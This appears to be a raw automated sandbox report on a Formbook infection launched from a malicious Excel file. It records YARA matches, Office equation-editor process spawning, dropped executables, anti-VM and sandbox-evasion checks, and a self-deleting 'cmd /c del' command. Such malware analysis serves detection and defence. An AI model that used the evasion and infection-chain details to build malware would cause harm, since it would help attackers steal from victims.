          Source: 4.2.vbc.exe.330a940.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.vbc.exe.330a940.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.684319508.0000000000190000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.684319508.0000000000190000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.540691245.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.540691245.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.508839358.0000000007FF5000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.508839358.0000000007FF5000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.478550746.00000000031E9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.478550746.00000000031E9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.684245712.0000000000080000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.684245712.0000000000080000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.540662107.00000000003D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.540662107.00000000003D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.500540075.0000000007FF5000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.500540075.0000000007FF5000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.684466431.00000000005A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.684466431.00000000005A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.540476989.0000000000080000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.540476989.0000000000080000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_0009C58D7_2_0009C58D
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_00082D877_2_00082D87
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_00082D907_2_00082D90
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_0009BE927_2_0009BE92
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_00082FB07_2_00082FB0
          Source: C:\Users\Public\vbc.exeCode function: String function: 008D3F92 appears 70 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 008D373B appears 185 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 008FF970 appears 71 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 0088E2A8 appears 32 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 0088DF5C appears 87 times
          Source: C:\Windows\SysWOW64\cmd.exeCode function: String function: 0235E2A8 appears 38 times
          Source: C:\Windows\SysWOW64\cmd.exeCode function: String function: 023A373B appears 237 times
          Source: C:\Windows\SysWOW64\cmd.exeCode function: String function: 023A3F92 appears 99 times
          Source: C:\Windows\SysWOW64\cmd.exeCode function: String function: 023CF970 appears 77 times
          Source: C:\Windows\SysWOW64\cmd.exeCode function: String function: 0235DF5C appears 101 times
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004185B0 NtCreateFile,5_2_004185B0
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00418660 NtReadFile,5_2_00418660
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004186E0 NtClose,5_2_004186E0
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00418790 NtAllocateVirtualMemory,5_2_00418790
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004185AA NtCreateFile,5_2_004185AA
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004186DA NtClose,5_2_004186DA
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041878A NtAllocateVirtualMemory,5_2_0041878A
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008800C4 NtCreateFile,LdrInitializeThunk,5_2_008800C4
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00880048 NtProtectVirtualMemory,LdrInitializeThunk,5_2_00880048
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00880078 NtResumeThread,LdrInitializeThunk,5_2_00880078
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008807AC NtCreateMutant,LdrInitializeThunk,5_2_008807AC
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0087F9F0 NtClose,LdrInitializeThunk,5_2_0087F9F0
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0087F900 NtReadFile,LdrInitializeThunk,5_2_0087F900
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0087FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_0087FAD0
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0087FAE8 NtQueryInformationProcess,LdrInitializeThunk,5_2_0087FAE8
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0087FBB8 NtQueryInformationToken,LdrInitializeThunk,5_2_0087FBB8
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0087FB68 NtFreeVirtualMemory,LdrInitializeThunk,5_2_0087FB68
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0087FC90 NtUnmapViewOfSection,LdrInitializeThunk,5_2_0087FC90
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0087FC60 NtMapViewOfSection,LdrInitializeThunk,5_2_0087FC60
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0087FD8C NtDelayExecution,LdrInitializeThunk,5_2_0087FD8C
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0087FDC0 NtQuerySystemInformation,LdrInitializeThunk,5_2_0087FDC0
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0087FEA0 NtReadVirtualMemory,LdrInitializeThunk,5_2_0087FEA0
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0087FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,5_2_0087FED0
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0087FFB4 NtCreateSection,LdrInitializeThunk,5_2_0087FFB4
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008810D0 NtOpenProcessToken,5_2_008810D0
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00880060 NtQuerySection,5_2_00880060
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008801D4 NtSetValueKey,5_2_008801D4
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0088010C NtOpenDirectoryObject,5_2_0088010C
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00881148 NtOpenThread,5_2_00881148
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0087F8CC NtWaitForSingleObject,5_2_0087F8CC
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00881930 NtSetContextThread,5_2_00881930
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0087F938 NtWriteFile,5_2_0087F938
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0087FAB8 NtQueryValueKey,5_2_0087FAB8
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0087FA20 NtQueryInformationFile,5_2_0087FA20
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0087FA50 NtEnumerateValueKey,5_2_0087FA50
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0087FBE8 NtQueryVirtualMemory,5_2_0087FBE8
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0087FB50 NtCreateKey,5_2_0087FB50
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0087FC30 NtOpenProcess,5_2_0087FC30
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_4A751E5F SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memcpy,memcpy,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,7_2_4A751E5F
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_4A74F6CF NtSetInformationProcess,GetFileAttributesW,_get_osfhandle,SetEndOfFile,7_2_4A74F6CF
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_4A73C2A6 NtQueryInformationToken,GetCPInfo,NtQueryInformationToken,GetCPInfo,NtQueryInformationToken,7_2_4A73C2A6
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_4A7418A6 _setjmp3,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,NtSetInformationProcess,7_2_4A7418A6
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_4A73C48A GetCPInfo,NtOpenThreadToken,NtOpenProcessToken,GetCPInfo,NtClose,7_2_4A73C48A
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_4A73C52D NtQueryInformationToken,7_2_4A73C52D
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_023500C4 NtCreateFile,LdrInitializeThunk,7_2_023500C4
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_023507AC NtCreateMutant,LdrInitializeThunk,7_2_023507AC
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_0234FAE8 NtQueryInformationProcess,LdrInitializeThunk,7_2_0234FAE8
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_0234FB68 NtFreeVirtualMemory,LdrInitializeThunk,7_2_0234FB68
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_0234FB50 NtCreateKey,LdrInitializeThunk,7_2_0234FB50
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_0234FBB8 NtQueryInformationToken,LdrInitializeThunk,7_2_0234FBB8
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_0234F900 NtReadFile,LdrInitializeThunk,7_2_0234F900
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_0234F9F0 NtClose,LdrInitializeThunk,7_2_0234F9F0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_0234FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,7_2_0234FED0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_0234FFB4 NtCreateSection,LdrInitializeThunk,7_2_0234FFB4
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_0234FC60 NtMapViewOfSection,LdrInitializeThunk,7_2_0234FC60
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_0234FD8C NtDelayExecution,LdrInitializeThunk,7_2_0234FD8C
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_0234FDC0 NtQuerySystemInformation,LdrInitializeThunk,7_2_0234FDC0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02350078 NtResumeThread,7_2_02350078
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02350060 NtQuerySection,7_2_02350060
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02350048 NtProtectVirtualMemory,7_2_02350048
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_023510D0 NtOpenProcessToken,7_2_023510D0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_0235010C NtOpenDirectoryObject,7_2_0235010C
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02351148 NtOpenThread,7_2_02351148
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_023501D4 NtSetValueKey,7_2_023501D4
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_0234FA20 NtQueryInformationFile,7_2_0234FA20
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_0234FA50 NtEnumerateValueKey,7_2_0234FA50
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_0234FAB8 NtQueryValueKey,7_2_0234FAB8
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_0234FAD0 NtAllocateVirtualMemory,7_2_0234FAD0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_0234FBE8 NtQueryVirtualMemory,7_2_0234FBE8
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_0234F8CC NtWaitForSingleObject,7_2_0234F8CC
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02351930 NtSetContextThread,7_2_02351930
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_0234F938 NtWriteFile,7_2_0234F938
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_0234FE24 NtWriteVirtualMemory,7_2_0234FE24
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_0234FEA0 NtReadVirtualMemory,7_2_0234FEA0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_0234FF34 NtQueueApcThread,7_2_0234FF34
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_0234FFFC NtCreateProcessEx,7_2_0234FFFC
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_0234FC30 NtOpenProcess,7_2_0234FC30
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02350C40 NtGetContextThread,7_2_02350C40
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_0234FC48 NtSetInformationFile,7_2_0234FC48
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_0234FC90 NtUnmapViewOfSection,7_2_0234FC90
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_0234FD5C NtEnumerateKey,7_2_0234FD5C
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02351D80 NtSuspendThread,7_2_02351D80
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_000985B0 NtCreateFile,7_2_000985B0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_00098660 NtReadFile,7_2_00098660
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_000986E0 NtClose,7_2_000986E0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_000985AA NtCreateFile,7_2_000985AA
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_000986DA NtClose,7_2_000986DA
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_4A73A902: CreateFileW,DeviceIoControl,memcpy,CloseHandle,FindFirstStreamW,FindNextStreamW,FindClose,7_2_4A73A902
          Source: deo[1].exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: vbc.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: C:\Users\Public\vbc.exeMemory allocated: 76F90000 page execute and read and write
          Source: C:\Users\Public\vbc.exeMemory allocated: 76E90000 page execute and read and write
          Source: deo[1].exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: vbc.exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: OCT 13 2021 - PRINT COPY.xlsxReversingLabs: Detection: 23%
          Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$OCT 13 2021 - PRINT COPY.xlsx
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRF833.tmp
          Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@9/13@6/6
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.ini
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_4A743185 GetDiskFreeSpaceExW,7_2_4A743185
          Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
          Source: explorer.exe, 00000006.00000000.495770768.0000000002AE0000.00000002.00020000.sdmpBinary or memory string: .VBPud<_
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Users\Public\vbc.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: Binary string: cmd.pdb,$ source: vbc.exe, 00000005.00000003.539428502.00000000004AC000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdb source: vbc.exe, cmd.exe
          Source: Binary string: cmd.pdb source: vbc.exe, 00000005.00000003.539476945.00000000004EA000.00000004.00000001.sdmp, cmd.exe
          Source: Binary string: cmd.pdb,$uJ6$uJ@$uJ source: vbc.exe, 00000005.00000003.539476945.00000000004EA000.00000004.00000001.sdmp, cmd.exe, 00000007.00000000.540165675.000000004A730000.00000040.00020000.sdmp

          Data Obfuscation:

          .NET source code contains potential unpacker
          Source: deo[1].exe.2.dr, MapEditor1/CreateMapDialog.cs.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: vbc.exe.2.dr, MapEditor1/CreateMapDialog.cs.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 4.0.vbc.exe.d60000.0.unpack, MapEditor1/CreateMapDialog.cs.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 4.2.vbc.exe.d60000.2.unpack, MapEditor1/CreateMapDialog.cs.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.0.vbc.exe.d60000.0.unpack, MapEditor1/CreateMapDialog.cs.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.2.vbc.exe.d60000.4.unpack, MapEditor1/CreateMapDialog.cs.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00258B50 push esp; iretd 4_2_00258B56
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00254497 push cs; iretd 4_2_00254499
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00252C96 push esi; iretd 4_2_00252C97
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B85C push eax; ret 5_2_0041B862
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00407027 push ebx; ret 5_2_00407096
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00415115 push es; iretd 5_2_00415128
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00414F3A push ds; iretd 5_2_00414F3B
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B7F2 push eax; ret 5_2_0041B7F8
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B7FB push eax; ret 5_2_0041B862
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B7A5 push eax; ret 5_2_0041B7F8
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_4A7313B6 push ecx; ret 7_2_4A7313C9
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_0235DFA1 push ecx; ret 7_2_0235DFB4
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_00087027 push ebx; ret 7_2_00087096
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_0009B85C push eax; ret 7_2_0009B862
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_00095115 push es; iretd 7_2_00095128
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_00094F3A push ds; iretd 7_2_00094F3B
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_0009B7A5 push eax; ret 7_2_0009B7F8
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_4A74D539 LoadLibraryW,GetProcAddress,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,7_2_4A74D539
          Source: initial sampleStatic PE information: section name: .text entropy: 7.77320879492
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\deo[1].exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exe

          Boot Survival:

          Drops PE files to the user root directory
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exe
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Yara detected AntiVM3
          Source: Yara matchFile source: 4.2.vbc.exe.21ee5b8.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000002.478433706.00000000021E1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2628, type: MEMORYSTR
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
          Source: vbc.exe, 00000004.00000002.478433706.00000000021E1000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Source: vbc.exe, 00000004.00000002.478433706.00000000021E1000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmd.exeRDTSC instruction interceptor: First address: 0000000000088604 second address: 000000000008860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmd.exeRDTSC instruction interceptor: First address: 000000000008898E second address: 0000000000088994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2816Thread sleep time: -120000s >= -30000s
          Source: C:\Users\Public\vbc.exe TID: 2556Thread sleep time: -38861s >= -30000s
          Source: C:\Users\Public\vbc.exe TID: 1636Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\cmd.exeLast function: Thread delayed
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004088C0 rdtsc 5_2_004088C0
          Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\Public\vbc.exeProcess information queried: ProcessInformation
